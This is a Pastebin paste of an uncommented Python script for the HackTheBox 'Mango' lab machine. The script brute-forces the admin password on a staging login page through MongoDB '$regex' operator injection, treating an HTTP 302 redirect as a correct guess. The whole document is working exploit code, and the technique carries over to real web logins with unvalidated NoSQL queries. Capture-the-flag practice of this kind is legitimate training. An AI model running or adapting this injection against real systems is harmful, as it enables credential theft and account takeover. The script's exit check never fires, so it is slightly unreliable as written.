Advertisement
r00tNEPAL

mango htb staging py

Feb 7th, 2020
384
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.86 KB | None | 0 0
  1. # MANGO
  2. # staging-order.mango.htb
  3. #python script
  4. import requests as req
  5. import string
  6. from requests_toolbelt.utils import dump
  7. flag = ""
  8. url="http://staging-order.mango.htb/"
  9. loop = True
  10. char = string.punctuation
  11. while loop:
  12.     loop = False
  13.     for i in string.ascii_letters + string.digits + char:
  14.         n=""
  15.         if i in char:
  16.             n+="\\"+i
  17.             i=n
  18.         payload = flag + i
  19.         d_send = {'username':'admin','password[$regex]':"^"+payload,'login':'login'}
  20.         r = req.post(url,data =d_send,allow_redirects=False)
  21.         print(payload)
  22.         #print(r.status_code)
  23.         #print(dump.dump_all(r))
  24.         if r.status_code == 302:
  25.             #print(payload)
  26.             loop = True
  27.             flag = payload
  28.            
  29.             if i == "":
  30.                 print(flag)
  31.                 exit(0)
  32.             break
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement